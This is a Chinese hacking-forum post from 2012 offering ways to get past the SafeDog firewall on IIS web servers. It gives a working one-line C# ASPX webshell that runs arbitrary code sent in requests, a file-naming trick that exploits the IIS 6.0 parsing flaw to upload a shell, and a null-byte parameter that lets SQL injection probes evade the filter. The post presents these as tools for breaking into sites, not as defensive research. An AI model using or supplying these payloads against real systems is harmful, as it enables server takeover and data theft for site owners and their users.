找回密码
 立即注册
查看: 2728|回复: 0
打印 上一主题 下一主题

突破安全狗防注入及上传的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:25:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、绕过IIS安全狗的一句话。% n5 E& A& ~2 P
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。% M  e' J+ Y7 u
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
' o) d+ {6 G( @4 h9 C) d+ Z1 n# l
2、IIS6.0解析漏洞遇到安全狗。
* l/ \$ i8 E% i! B3 ~0 ?文件名为
$ G! u: S6 _9 u  F5 q/ o! }3 T8 D- ghttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
" @$ G5 y) y5 A( l, T) w3 p; o/ r8 s! K- C* L- U5 D. Q& j
这样的会被IIS安全狗果断屏蔽。
+ A0 ]7 p  l7 H1 n8 F6 S改成如下名称,IIS6一样会解析:
1 ^; O* g  b4 f: {) H: Mwww.xxxxx.com/;1.asp;1.jpg! Q7 @, y: ]5 V  y1 k) n

1 [9 J( W* ?4 s" C7 ]3、安全狗的注入绕过。
. E5 t+ G3 O) B$ L' A( Y常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。3 h  [$ ?0 F) T/ r: z5 ]" e- W
但如果:
& J9 E+ I3 G& L% U; @- f2 Z: Z& d& o+ `r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1& D, c' ~/ \2 Z3 P
就可以成功绕过了。7 Y6 E8 }! x( C5 x. _0 D9 G  w3 A

$ D" n- }2 b% e2 S( _: I" M0 m
! `5 ~3 y& q; m) j" v5 o. F& p( Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表